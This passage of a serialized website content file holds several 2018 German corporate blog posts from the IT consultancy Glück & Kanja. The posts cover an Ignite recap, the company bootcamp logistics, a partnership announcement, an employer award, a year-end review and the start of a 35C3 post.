erleichtern. Mit ",[433,2230,2231],{},"Desktop Analytics"," erhalten wir eine engere Integration der Telemetriedaten von Windows Analytics in Intune, um eine gute Abdeckung Ihrer LOB-Apps in den Pilotringen zu gewährleisten.",[629,2234,2236],{"id":2235},"windows-virtual-desktop","Windows Virtual Desktop",[353,2238,2239,2240,2242],{},"Mit ",[433,2241,2236],{}," will Microsoft eine neue Zielgruppe in Azure erschließen: Unternehmen, die ihren Mitarbeitern einen mobilen Arbeitsplatz bereitstellen möchten, können die virtuellen Maschinen mit Windows und Microsoft Office buchen. Sie sind für mehrere Benutzer geeignet und sollen Terminalserver auf Basis von Windows Servern ersetzen.",[629,2244,964],{"id":1683},[353,2246,2247,2248,2253,2254,2259],{},"Auch für Teams kündigte Microsoft eine Menge Neuigkeiten an wie zum Beispiel ",[374,2249,2252],{"href":2250,"rel":2251},"https://www.youtube.com/watch?v=6Xd7IaI5Kb8",[378],"Hintergrundunschärfe bei Videokonferenzen",", um störende Umgebungen oder Personen herauszufiltern, Aufzeichnungen von Besprechungen aus Teams heraus, Integration von Videokonferenz-Lösungen externer Partner, Bildschirmfreigabe im Chat. Microsoft integriert außerdem ",[374,2255,2258],{"href":2256,"rel":2257},"https://techcommunity.microsoft.com/t5/Office-365-Blog/Announcing-intelligent-event-capabilities-in-Microsoft-365/ba-p/214061",[378],"Live-Streams und On-Demand-Events"," in Microsoft 365. Nutzer können dann in Microsoft Teams, Stream oder Yammer an Live-Streams und On-Demand-Events teilnehmen und interagieren.",[629,2261,2263],{"id":2262},"microsoft-authenticator-und-microsoft-threat-protection","Microsoft Authenticator und Microsoft Threat Protection",[353,2265,2266,2267,2270,2271,2274,2275,2278],{},"Auch in Punkto Sicherheit werden Unternehmenskunden mit weiteren Funktionen unterstützt. Ab sofort ermöglicht die ",[433,2268,2269],{},"Microsoft Authenticator App"," das passwortlose Anmelden. Microsoft möchte damit das Risiko eines Identitätsdiebstahls verringern. Die Anmeldung bei Tausenden von Anwendungen, die mit Azure Active Directory verbunden sind, wird dadurch unterstützt. Außerdem dient der im April eingeführte ",[433,2272,2273],{},"Secure Score"," von Microsoft als Cybersicherheitsreport für Unternehmen. Er soll nun eine breitere Palette von Kontrollen von Microsoft Cloud App Security, Azure Active Directory und Azure Security Center umfassen. Mit ",[433,2276,2277],{},"Microsoft Threat Protection"," werden die Threat Protection-Lösungen für Office, Azure und Windows in einem einzigen integrierten Angebot in Microsoft 365 vereint. Es dient als durchgängiges Angebot zur Erkennung von Bedrohungen und zur Behebung ihrer Auswirkungen.",{"title":402,"searchDepth":403,"depth":403,"links":2280},[2281,2282,2283,2284,2285,2286],{"id":2152,"depth":704,"text":2153},{"id":2204,"depth":704,"text":2205},{"id":2220,"depth":704,"text":2221},{"id":2235,"depth":704,"text":2236},{"id":1683,"depth":704,"text":964},{"id":2262,"depth":704,"text":2263},"Am Freitag ist die Microsoft Ignite 2018 zu Ende gegangen. Microsofts größte Veranstaltung für IT-Profis und Unternehmensentwickler wird jedes Jahr größer und kann aktuell auf mehr als 26.000 Teilnehmer aus über 100 Ländern zurückblicken. Unser MVP Oliver Kieselbach war live vor Ort und hat die wichtigsten Themen zusammengefasst:",{"categories":2289,"blogtitlepic":2290,"thumb":2291,"socialimg":2292,"customExcerpt":2293},[422],"head-ignite-2018","thumb-ignite-2018","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-ignite-2018.jpg","Am Freitag ist die Microsoft Ignite 2018 zu Ende gegangen. Microsofts größte Veranstaltung für IT-Profis und Unternehmensentwickler wird jedes Jahr größer und kann aktuell auf mehr als 26.000 Teilnehmer aus über 100 Ländern zurückblicken. Unser MVP Oliver Kieselbach war live vor Ort und hat die wichtigsten Themen zusammengefasst.","2018-10-01","/posts/2018-09-30-ignite-wrap-up",{"title":2133,"description":2287},"posts/2018-09-30-ignite-wrap-up",[2299,1562],"Ignite","LPEB8wk26caWi03PlYUzoM5WZlm_d4QUUb0p734a5RQ",{"id":2302,"title":2303,"author":160,"body":2304,"cta":3,"description":2308,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2426,"moment":2432,"navigation":415,"path":2433,"seo":2434,"stem":2435,"tags":2436,"webcast":406,"__hash__":2437},"content_de/posts/2018-10-29-bootcamp-behind-the-scenes.md","Bootcamp 2018 - Behind the Scenes",{"type":350,"value":2305,"toc":2424},[2306,2309,2315,2322,2328,2335,2341,2349,2355,2361,2371,2374,2380,2401,2407,2415,2421],[353,2307,2308],{},"Alles begann am Samstag, den 08. September 2018 um 16:00, mit dem Versuch, einen 3,5 Tonner abzuholen. Das Fahrzeug stand zwar auf dem Hof der Autovermietung, aber seine Hebebühne ließ sich weder nach oben noch nach unten fahren. Was für ein Auftakt zum diesjährigen Bootcamp! Schließlich warteten etwas mehr als 1t Material in unserem Offenbacher Büro auf den Transport nach Siegen.",[353,2310,2311],{},[356,2312],{"alt":2313,"src":2314},"Material in Küche","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/bootcamp2018-behindthescenes-kueche.jpg",[353,2316,2317,2318,2321],{},"Alternativen gab es zu diesem Zeitpunkt keine mehr. Im gesamten Rhein-Main Gebiet war kein anderer Transporter mit der gleichen Ausstattung zu organisieren. Einziger Ausweg: Warten auf die Rückgabe eines vergleichbaren Fahrzeugs. Um 19:15 Uhr kam dann der langersehnte 3,5 Tonner mit Hebebühne. Zu dritt wurden alle Sachen verladen. Trotz guter Planung inklusive aufgeklebter Abmaße des Transportes in der Küche war es ",[433,2319,2320],{},"Tetris für Erwachsene",". Etwa gegen 22:00 Uhr war es dann geschafft. Transporter voll. Orga-Team k.o.! Zeit für eine Pause gab es allerdings nicht - wir mussten noch am gleichen Abend Siegen erreichen. Gegen Mitternacht fuhren wir dann vor dem Hotel vor. Endlich Feierabend!",[353,2323,2324],{},[356,2325],{"alt":2326,"src":2327},"Lastwagen","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/bootcamp2018-behindthescenes-laster.jpg",[353,2329,2330,2331,2334],{},"Am nächsten Morgen, die Nacht war kurz, ging es dann an den Aufbau. Es galt eine ",[433,2332,2333],{},"600qm große Halle"," in eine Top-Location für 6 Tage zu verwandeln. Da wir in den letzten Bootcamp-Jahren unseren Einsatz und technische Umsetzung stets gesteigert hatten, waren die Erwartungen unserer Kollegen auch in diesem Jahr wieder hoch.",[353,2336,2337],{},[356,2338],{"alt":2339,"src":2340},"Konferenzraum vor dem Aufbau","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/bootcamp2018-behindthescenes-onsitebefore.jpg",[353,2342,2343,2344,2348],{},"Zunächst wurden die Tische in der Halle aufgestellt und am hinteren Ende der Halle die Regie eingerichtet. Hierzu wurde unser selbst konstruiertes Flightcase mit der gesamten Videotechnik aufgebaut. Anschließend wurden zwei High-End Video Kameras positioniert: eine Pan-Tilt-Zoom Kamera am hinteren Ende der Halle und eine weitere manuell zu bedienende Kamera samt Stativ an der Seite auf einem Podest. Die Videosignale der Kameras wurden in einen Netzwerkstream namens NDI verwandelt und per Netzwerk an die Regie übetragen. Jeder Stream belegte ca. 100-120 MBit/sec. Per SDI, ähnlich der NDI Technologie, nur das diese das Videosignal über BNC Kabel schickt, wurden die beiden Projektoren in der Halle und das Videobild des Referenten von und zur Regie übertragen. Das Signal wurde dann direkt per BNC Kabel in den Regie-Rechner eingespeist. Hierzu verwendeten wir Produke aus dem High-End Broadcast Segment von ",[374,2345,2347],{"href":679,"rel":2346},[378],"Blackmagic Design",". Auf Grund der langen Kabelwege zwischen Bühne und Regie war der Einsatz von klassischen HDMI Kabeln nicht möglich. Auch dieser Tag schien einfach kein Ende zu nehmen.",[353,2350,2351,2352,2354],{},"Da alle Vorträge aufgenommen wurden, um sie im Anschluss in ",[433,2353,903],{}," den Mitarbeitern zur Verfügung zu stellen, war es zwingend notwendig, die Speaker bei den Vorträgen mit Mikrofonen auszustatten. Um zusätzlich auch die Zuschauerfragen einzufangen, standen immer zwei Kollegen mit Handmikrofonen bereit. Insgesamt waren in Spitzenzeiten bis zu sechs Mikrofone im Einsatz, die es natürlich auch professionell abzumischen galt.",[353,2356,2357],{},[356,2358],{"alt":2359,"src":2360},"Konferenzraum nach dem Aufbau","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/bootcamp2018-behindthescenes-onsiteafter.jpg",[353,2362,2363,2364,2366,2367,2370],{},"Als Highlight wurde dann am Freitag auch der ",[433,2365,558],{}," live vom Bootcamp übertragen. Dies stellte noch mal eine besondere Anforderung an das Setup vor Ort. Es wurde hierfür eigens ein Intro gedreht. Dazu wurden die Clips ein paar Tage vor dem Webcast aufgenommen, ins OneDrive geladen, im Anschluss in Offenbach editiert und das finale Video wieder per OneDrive zurück nach Siegen gesynct. Die erste Session hatte dann noch ein paar kleine Sonderanforderungen wie drei Notebooks mit Demos und ein Telefon, welches mit Webcam gecaptured werden musste. Das I-Tüpfelchen war ein iPhone, welches in die Live-Session gebracht werden musste. Nicht zu vergessen, das Slidedeck und die Kameras im Publikum und auf der Bühne. Zwischenzeitlich ",[433,2368,2369],{},"jonglierte die Regie mit 31 verschiedenen Inputs",". Das ganze Ensemble musste dann nur noch ins Internet gebracht werden. Um nicht auf die Leitung des Hotels angewiesen zu sein, wurden zwei LTE-Richtfunkantennen in Betrieb genommen, die zusammen mit dem Hotel-Internetzugang über einen Ubiquiti Edge Router geloadbalanced wurden.\nNach dem Webcast wurde wieder alles binnen einer halben Stunde umgebaut, um mit den internen Vorträgen zu beginnen.",[353,2372,2373],{},"Ab Freitagnachmittag traf auch der Rest der Glück & Kanja Belegschaft in Siegen ein, wie auch die Familien, die alle zum gemeinsamen Event-Wochenende eingeladen waren.",[353,2375,2376],{},[356,2377],{"alt":2378,"src":2379},"Hochseilgarten","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/bootcamp2018-behindthescenes-hochseilgarten.jpg",[353,2381,2382,2383,2386,2387,2390,2391,2394,2395,2400],{},"Samstagmittag stattete das Orga-Team das ",[433,2384,2385],{},"Oktoberfestzelt"," für den Abend mit der entsprechender Technik aus, während die Kolleginnen, Kollegen und Familien sich im Hochseilklettergarten in schwindelerregende Höhen wagten. Da bei Glück & Kanja der eine oder andere ",[433,2388,2389],{},"Technik-Nerd"," arbeitet, war es uns möglich, das Festzelt wie eine ",[433,2392,2393],{},"Großraum-Disco"," auszustatten. Neben 16x Wall-Washern, 4x PAR64, 4x Schwarzlichtlampen, 2x Moving Heads, 2x Scanner, Nebelmaschine, Seifenblasenmaschine, etwas Kleinkram, kam auch ein großer Showlaser zum Einsatz. Das ganze Equipment brauchte natürlich jede Menge Strom - kein Problem. Kurz aus dem Transporter die 32A Starkstromkabel und Verteiler geholt und das Festzelt verkabelt. Zusätzlich zum Licht, das über einen Computer per DMX und ",[374,2396,2399],{"href":2397,"rel":2398},"https://www.daslight.com/",[378],"DasLight"," gesteuert wurde, haben wir noch fix eine Soundanlage aufgebaut.",[353,2402,2403],{},[356,2404],{"alt":2405,"src":2406},"Party","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/bootcamp2018-behindthescenes-party.jpg",[353,2408,2409,2410,2414],{},"Damit am Abend jeder Musikwunsch erfüllt werden konnte, haben wir uns für eine collaborative Playlist mittels ",[374,2411,2412],{"href":2412,"rel":2413},"https://festify.us",[378]," entschieden. Hier konnte jeder von seinem Smartphone aus Lieder vorschlagen oder bereits bestehende Lieder in der Playlist liken. Der Song mit den meisten Likes wurde automatisch als nächstes gespielt.",[353,2416,2417,2420],{},[433,2418,2419],{},"\"Des woar a Mordsgaudi!\""," Sonntag früh 3:30 Uhr ging die Party zu Ende. Sonntag früh 7:00 Uhr starteten wir den Abbau. Dank der tatkräfigen Unterstüzung einiger Kollegen war der Transporter um 9:30 Uhr beladen und abfahrbereit. Gegen Mittag waren wir dann wieder im Offenbacher Büro. Dann noch kurz Ausladen und um 15:30 Uhr war Schluss.",[353,2422,2423],{},"Für das Orga-Team waren es anstrengende 9 Tage. Spaß gemacht hat es aber alle Mal.\nUnd wir freuen uns schon auf eine neue Herausforderung in 2 Jahren 🙃",{"title":402,"searchDepth":403,"depth":403,"links":2425},[],{"categories":2427,"blogtitlepic":2428,"thumb":2429,"socialimg":2430,"customExcerpt":2431},[410],"head-bootcamp2018-behindthescenes","thumb-bootcamp2018-behindthescenes","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-bootcamp2018-behindthescenes.jpg","Seit mehr als 10 Jahren fahren alle Mitarbeiter und Mitarbeiterinnen von Glück & Kanja ins GK Bootcamp. Das bedeutete dieses Jahr: 60 Menschen, 1 Woche, 1t Material, 600qm Eventlocation und 20 Stunden Video Streaming. Zeit, einen Blick hinter die Kulissen zu werfen.","2018-10-29","/posts/2018-10-29-bootcamp-behind-the-scenes",{"title":2303,"description":2308},"posts/2018-10-29-bootcamp-behind-the-scenes",[1825],"1jvjH6hTCyinqjtthukTF32oOftXz7N5RTlGwi8ixC8",{"id":2439,"title":2440,"author":191,"body":2441,"cta":3,"description":2445,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2489,"moment":2495,"navigation":415,"path":2496,"seo":2497,"stem":2498,"tags":2499,"webcast":406,"__hash__":2503},"content_de/posts/2018-11-15-phat-gab-gk-partnerschaft.md","Big enough to deliver, small enough to care",{"type":350,"value":2442,"toc":2487},[2443,2446,2466,2472,2475,2478,2481,2484],[353,2444,2445],{},"Hamburg / München / Offenbach. 100% Cloud. Das ist das Motto der strategischen Partnerschaft der führenden Microsoft Cloud Beratungshäuser im Microsoft Enterprise Segment.",[353,2447,2448,2449,2454,2455,993,2460,2465],{},"Als langjährige Partner verfolgen ",[374,2450,2453],{"href":2451,"rel":2452},"https://www.phatconsulting.de/",[378],"PHAT CONSULTING",", ",[374,2456,2459],{"href":2457,"rel":2458},"https://www.gab.de/",[378],"GAB Enterprise IT Solutions",[374,2461,2464],{"href":2462,"rel":2463},"https://glueckkanja.com/",[378],"Glück & Kanja"," eine gemeinsame Beratungsstrategie für die Transformation der Produktivitätsinfrastruktur hin zu Office 365 und Azure.",[353,2467,2468],{},[356,2469],{"alt":2470,"src":2471},"Partner","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/gk-logos-alliance.png",[353,2473,2474],{},"Mit ähnlichen Unternehmensstrukturen und -kulturen, einem ergänzenden Lösungsportfolio und räumlicher Nähe zu den Kunden liegt der Fokus auf einer engen und abgestimmten Zusammenarbeit zwischen Kunden, Microsoft und den drei langjährigen Infrastruktur- und Cloud-Partnern.",[353,2476,2477],{},"\"Wir nutzen unsere komplementären Kompetenzen und schaffen so hervorragende Synergieeffekte zum Vorteil unserer Kunden\", so Michael Breither, Vorstand der Glück & Kanja Consulting AG. Nils Langemann, Geschäftsführer der PHAT CONSULTING GmbH, ergänzt: \"Digitalisierung ist Mannschaftssport. Gerade Anforderungen aus dem Business und die offene Kommunikation sind extrem wichtig für die Gestaltungsmöglichkeiten der neuen Art zu arbeiten. Bei der Umsetzung setzen wir konsequent auf Microsoft Lösungen\". Das kann Harald Ehrl, Geschäftsführer der GAB Enterprise IT Solutions GmbH, nur bestätigen: \"In Sachen Technologie sind wir drei Partner führend. Da macht uns so schnell keiner etwas vor. Wir etablieren Lösungen, die richtungsweisend sind. Mit Microsoft an unserer Seite führen wir für unsere Kunden zukunftssichere Lösungen ein, die wirklich ‚evergreen‘ bleiben\".",[353,2479,2480],{},"Die Vision ist klar: Die bestmögliche, zukunftsweisende Lösung für den Kunden, die den aktuellen Sicherheitsanforderungen gerecht wird und für den Kunden einfach, transparent und nutzenorientiert betreibbar ist; und das mit nur einem Ansprechpartner und Microsoft.",[353,2482,2483],{},"Für Kunden bietet sich ein enormes Potential: Sie erhalten die technologische Grundlage für die Herausforderungen der Digitalisierung. Moderne Arbeitsweisen werden unterstützt und vereinfacht durch Werkzeuge, die optimal auf die Bedürfnisse der Mitarbeiter und des Unternehmens abgestimmt sind. \"Technologie alleine ist aber nicht entscheidend,\" fasst Nils Langemann zusammen. \"Ebenso wichtig ist ein kultureller Wandel und begleitende Prozesse, um einen ganzheitlichen Erfolg zu erzielen.\"",[353,2485,2486],{},"Diese Partnerschaft unterstützt Unternehmen durch beste Referenzen, hohes Implementierungstempo, Kompetenzführerschaft und klare Kundenorientierung.",{"title":402,"searchDepth":403,"depth":403,"links":2488},[],{"categories":2490,"blogtitlepic":2491,"thumb":2492,"socialimg":2493,"customExcerpt":2494},[410],"head-alliance","thumb-alliance","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-alliance.jpg","100% Cloud. Das ist das Motto der strategischen Partnerschaft der führenden Microsoft Cloud Beratungshäuser im Microsoft Enterprise Segment.","2018-11-16","/posts/2018-11-15-phat-gab-gk-partnerschaft",{"title":2440,"description":2445},"posts/2018-11-15-phat-gab-gk-partnerschaft",[2500,2501,2502],"PHAT","Partnerschaft","Synergie","3oWpzxjFSFWLk2TJ9Mue5oanNVs7HSJLnSSMm-sK69g",{"id":2505,"title":2506,"author":144,"body":2507,"cta":3,"description":2511,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2530,"moment":2535,"navigation":415,"path":2536,"seo":2537,"stem":2538,"tags":2539,"webcast":406,"__hash__":2541},"content_de/posts/2018-12-05-gk-top-employer.md","Glück & Kanja ist Top-Arbeitgeber Mittelstand 2019",{"type":350,"value":2508,"toc":2528},[2509,2512,2519,2522,2525],[353,2510,2511],{},"FOCUS-BUSINESS in Kooperation mit kununu.com haben Glück & Kanja als Top Arbeitgeber im Mittelstand für das Jahr 2019 ausgezeichnet.",[353,2513,2514,2518],{},[356,2515],{"src":2516,"style":2517},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/top-arbeitgeber.png","float: right;"," Wie wurden die Top-Arbeitgeber ermittelt: Als Kriterien wurden die Unternehmensgröße (11 bis 500 Mitarbeiter), die Bewertungen der Mitarbeiter auf der Internet-Plattform kununu.com (mindestens 3,5 Punkte) sowie die Anzahl der Bewertungen berücksichtigt.",[353,2520,2521],{},"Wir freuen uns sehr über diese Auszeichnung, hat sie doch auch eine starke Signalwirkung nach innen und nach außen. Sie gibt künftigen Bewerbern eine gute Orientierung, was sie bei uns erwarten können.",[353,2523,2524],{},"Gute Mitarbeiter sind das Kapital eines jeden Unternehmens. Durch unsere flache Hierarchie, größtmögliche Freiheit, gekennzeichnet durch selbstständiges und eigenverantwortliches Handeln, Rücksichtsnahme auf den jeweiligen Lebensabschnitt durch Arbeitszeit und Homeoffice, versuchen wir unsere Mitarbeiter zu binden und dauerhaft zu motivieren. Im Umkehrschluss bedeutet das für unsere Kunden, dass wir in jedem Projekt Höchstleistungen erbringen.",[353,2526,2527],{},"Die komplette Liste ist in Focus-Business 04/18 „Arbeitgeber des Mittelstands 2019“ erschienen.",{"title":402,"searchDepth":403,"depth":403,"links":2529},[],{"categories":2531,"blogtitlepic":2532,"thumb":2533,"socialimg":2534,"customExcerpt":2511},[410],"head-top-employer","thumb-top-employer","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-top-employer.jpg","2018-12-05","/posts/2018-12-05-gk-top-employer",{"title":2506,"description":2511},"posts/2018-12-05-gk-top-employer",[474,2540],"Top Arbeitgeber","iLgtpnJaw6HIe1p1JFpAiudxyaKlh7AcMt-cnzIykco",{"id":2543,"title":2544,"author":191,"body":2545,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2687,"moment":2693,"navigation":415,"path":2694,"seo":2695,"stem":2696,"tags":2697,"webcast":406,"__hash__":2700},"content_de/posts/2018-12-11-gk-xmas.md","Das sind die Glück & Kanja Highlights 2018",{"type":350,"value":2546,"toc":2684},[2547,2552,2588,2613,2636,2659,2681],[2548,2549,2551],"h2",{"id":2550},"das-waren-unsere-highlights-in-2018","Das waren unsere Highlights in 2018",[2553,2554,2557,2558],"section",{"className":2555},[2556],"container","\n    ",[2559,2560,2566,2567,2566,2579,2557],"div",{"className":2561},[2562,2563,2564,2565],"row","align-items-center","no-gutters","g-pa-5x","\n        ",[2559,2568,2571,2572,2571,2576,2566],{"className":2569},[2570],"col-md-6","\n            ",[629,2573,2575],{"id":2574},"bootcamp-2018","Bootcamp 2018",[353,2577,2578],{},"Alle zwei Jahre nehmen wir uns eine einwöchige Auszeit vom Daily Business, um uns im GK Bootcamp ganz den neuesten Trends und Technologien widmen zu können. Mit dem diesjährigen Motto blieben wir natürlich unserer 100% Cloud Strategie treu. Client Roadmap, Microsoft Graph, Azure Automation, Modern Workplace Services, Security Operations Center und UC Cloud Transformation standen auf dem Programm, um nur einige der vielen Teilbereiche zu nennen, die am Ende zu einen vollumfänglichen 100% Cloud Blueprint für Enterprise Unternehmen führten.",[2559,2580,2571,2582,2566],{"className":2581},[2570],[2559,2583,2587],{"className":2584},[2585,2586],"overflow-hidden","shadow","\n                {% cloudinary /blog/heads/head-back-from-bootcamp.jpg alt=\"Bootcamp 2018\" no-small img-responsive %}\n            ",[2553,2589,2557,2591],{"className":2590},[2556],[2559,2592,2566,2594,2566,2605,2557],{"className":2593},[2562,2563,2564,2565],[2559,2595,2571,2598,2571,2602,2566],{"className":2596},[2570,2597],"col-md-push-6",[629,2599,2601],{"id":2600},"wir-wachsen-weiter","Wir wachsen weiter",[353,2603,2604],{},"Wir sind ein Team aus ganz unterschiedlichen Persönlichkeiten, die sich für Cloud Technologien und permanente Neuerungen begeistern. Auch in 2018 sind wir stetig gewachsen und freuen uns auch im kommenden Jahr über jeden Zuwachs. FOCUS-BUSINESS in Kooperation mit kununu.com hat uns gerade zum Top Arbeitgeber im Mittelstand für das Jahr 2019 ausgezeichnet.",[2559,2606,2571,2609,2566],{"className":2607},[2570,2608],"col-md-pull-6",[2559,2610,2612],{"className":2611},[2585,2586],"\n                {% cloudinary /people/people-in-kitchen-02.jpg alt=\"Jobs\" no-small img-responsive %}\n            ",[2553,2614,2557,2616],{"className":2615},[2556],[2559,2617,2566,2619,2566,2629,2557],{"className":2618},[2562,2563,2564,2565],[2559,2620,2571,2622,2571,2626,2566],{"className":2621},[2570],[629,2623,2625],{"id":2624},"oliver-kieselbach-wird-mvp","Oliver Kieselbach wird MVP",[353,2627,2628],{},"MVP steht für Most Valuable Professional und zeichnet leidenschaftliche Technologieexperten aus, die ihr Wissen mit der Community teilen. Wir haben uns riesig gefreut, dass jetzt auch unser Kollege Oliver Kieselbach dieser technischen Elite angehört. Und wer weiss, ob nicht weitere MVPs im nächsten Jahr folgen!",[2559,2630,2571,2632,2566],{"className":2631},[2570],[2559,2633,2635],{"className":2634},[2585,2586],"\n                {% cloudinary /people/oli-kieselbach.jpg alt=\"MVP\" no-small img-responsive %}\n            ",[2553,2637,2557,2639],{"className":2638},[2556],[2559,2640,2566,2642,2566,2652,2557],{"className":2641},[2562,2563,2564,2565],[2559,2643,2571,2645,2571,2649,2566],{"className":2644},[2570,2597],[629,2646,2648],{"id":2647},"redmond-meets-offenbach","Redmond meets Offenbach",[353,2650,2651],{},"Besuche der Redmonder in unserem Offenbacher Office stehen inzwischen regelmäßig auf dem Programm, um gemeinsam Kunden zu besuchen und sich so vor Ort einen Einblick über Arbeitsweisen und Anforderungen zu verschaffen. Wir hatten tolle Gespräche, und es wurden Details zur Zukunft von Microsoft Intune, Modern Management und Modern Deployment diskutiert. Wir freuen uns auf weitere Besuche in kommenden Jahr!",[2559,2653,2571,2655,2566],{"className":2654},[2570,2608],[2559,2656,2658],{"className":2657},[2585,2586],"\n                {% cloudinary /blog/heads/head-brad-anderson-visit.jpg alt=\"Redmond\" no-small img-responsive %}\n            ",[2553,2660,2557,2662],{"className":2661},[2556],[2559,2663,2566,2665,2566,2674,2557],{"className":2664},[2562,2563,2564,2565],[2559,2666,2571,2668,2571,2671,2566],{"className":2667},[2570],[629,2669,2440],{"id":2670},"big-enough-to-deliver-small-enough-to-care",[353,2672,2673],{},"Die Strategische Partnerschaft der führenden Microsoft Cloud Beratungshäuser PHAT CONSULTING, GAB Enterprise IT Solutions und Glück & Kanja mit dem Ziel, eine gemeinsame Beratungsstrategie für die Transformation der Produktivitätsinfrastruktur hin zu Office 365 und Azure zu verfolgen.",[2559,2675,2571,2677,2566],{"className":2676},[2570],[2559,2678,2680],{"className":2679},[2585,2586],"\n                {% cloudinary /blog/heads/head-alliance.jpg alt=\"Partnerschaft\" no-small img-responsive %}\n            ",[353,2682,2683],{},"Auch in 2019 werden wir weiter daran arbeiten, die bestmögliche, zukunftsweisende Lösung für unsere Kunden bereitzustellen. Wir wünschen Ihnen im Namen des gesamten Glück & Kanja Teams frohe Weihnachten, einen erholsamen Jahresausklang und alles Gute für 2019!",{"title":402,"searchDepth":403,"depth":403,"links":2685},[2686],{"id":2550,"depth":403,"text":2551},{"categories":2688,"blogtitlepic":2689,"thumb":2690,"socialimg":2691,"customExcerpt":2692},[410],"head-xmas-hats","thumb-xmas-hats","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-xmas-hats.jpg","Mit großen Schritten nähern wir uns Weihnachten und dem Jahreswechsel. Für uns Anlass, die wichtigsten Ereignisse des letzten Jahres Revue passieren zu lassen. Wir blicken auf ein erfolgreiches Jahr 2018 zurück. Mit vielen spannenden Projekten, alten und neuen Kunden und zahlreichen Veranstaltungen.","2018-12-11","/posts/2018-12-11-gk-xmas",{"title":2544,"description":402},"posts/2018-12-11-gk-xmas",[2698,2699],"Xmas","Rückblick","RH1jjBtyR4cDcOTnObmspKFMLYHP9QK1gGegdsRitUA",{"id":2702,"title":2703,"author":191,"body":2704,"cta":3,"description":2728,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2729,"moment":2735,"navigation":415,"path":2736,"seo":2737,"stem":2738,"tags":2739,"webcast":406,"__hash__":2742},"content_de/posts/2018-12-19-sichere-daten-durch-klassifizierung.md","Sichere Daten durch Klassifizierungen",{"type":350,"value":2705,"toc":2726},[2706,2712],[353,2707,2708,2709,456],{},"Wenn wertvolle Informationen aus einem Unternehmen heraussickern, kann das teuer, peinlich oder beides werden. Wer solche Missgeschicke wirksam verhindern will, muss die richtigen Schutzmaßnahmen treffen. Für die aktuelle Januar Ausgabe der Zeitschrift iX haben Glück & Kanja Security-Experte Dr. Christoph Hannebauer und Lead Cloud Architect Marco Scheel dieses Thema recherchiert. Lesen Sie den ganzen Artikel ",[374,2710,1491],{"href":2711},"/documents/articles/201901-ix-Sichere-Daten-durch-Klassifizierung.pdf",[353,2713,2714,1501,2721],{},[374,2715,2717],{"href":1496,"rel":2716},[378],[356,2718],{"alt":2719,"src":2720},"Januar iX Ausgabe 2019","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/201901-cover-ix.png",[374,2722,2723],{"href":2711},[356,2724],{"alt":1332,"src":2725},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/201901-artikel-ix.png",{"title":402,"searchDepth":403,"depth":403,"links":2727},[],"Wenn wertvolle Informationen aus einem Unternehmen heraussickern, kann das teuer, peinlich oder beides werden. Wer solche Missgeschicke wirksam verhindern will, muss die richtigen Schutzmaßnahmen treffen. Für die aktuelle Januar Ausgabe der Zeitschrift iX haben Glück & Kanja Security-Experte Dr. Christoph Hannebauer und Lead Cloud Architect Marco Scheel dieses Thema recherchiert. Lesen Sie den ganzen Artikel hier.",{"categories":2730,"blogtitlepic":2731,"thumb":2732,"socialimg":2733,"customExcerpt":2734},[1117],"head-klassifizierung","thumb-klassifizierung","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-klassifizierung.jpg","Wenn wertvolle Informationen aus einem Unternehmen heraussickern, kann das teuer, peinlich oder beides werden. Wer solche Missgeschicke wirksam verhindern will, muss die richtigen Schutzmaßnahmen treffen.","2018-12-19","/posts/2018-12-19-sichere-daten-durch-klassifizierung",{"title":2703,"description":2728},"posts/2018-12-19-sichere-daten-durch-klassifizierung",[1521,2740,2741],"iX","Klassifizierung","EYCEmfqDDQB6303jmyBQS43jLxmpzbxRFZuMJF8HYaw",{"id":2744,"title":2745,"author":191,"body":2746,"cta":3,"description":2850,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":2851,"moment":2857,"navigation":415,"path":2858,"seo":2859,"stem":2860,"tags":2861,"webcast":406,"__hash__":2864},"content_de/posts/2018-12-28-chaos-communication-congress.md","35C3",{"type":350,"value":2747,"toc":2847},[2748,2759,2762,2771,2780,2789,2804,2810,2814,2823,2826,2833],[353,2749,2750,2751,2754,2755,2758],{},"Gestern startete der ",[433,2752,2753],{},"35. Chaos Communication Congress"," - kurz 35C3 - in Leipzig unter dem Motto ",[433,2756,2757],{},"Refreshing Memories",". Die viertägige Veranstaltung gehört inzwischen zu einer der größten Hackertreffen der Welt und wächst jedes Jahr weiter. Rund 17.000 Technikfreaks finden sich zusammen, um in zahlreichen Vorträgen und Workshops kritisch die Auswirkungen von Technologie auf die Gesellschaft zu diskutieren.",[353,2760,2761],{},"Tickets für diese Veranstaltung zu bekommen, gleicht einem Glücksspiel. In diesem Jahr konnten gleich zwei Glück & Kanja Mitarbeiter eine der begehrten Karten 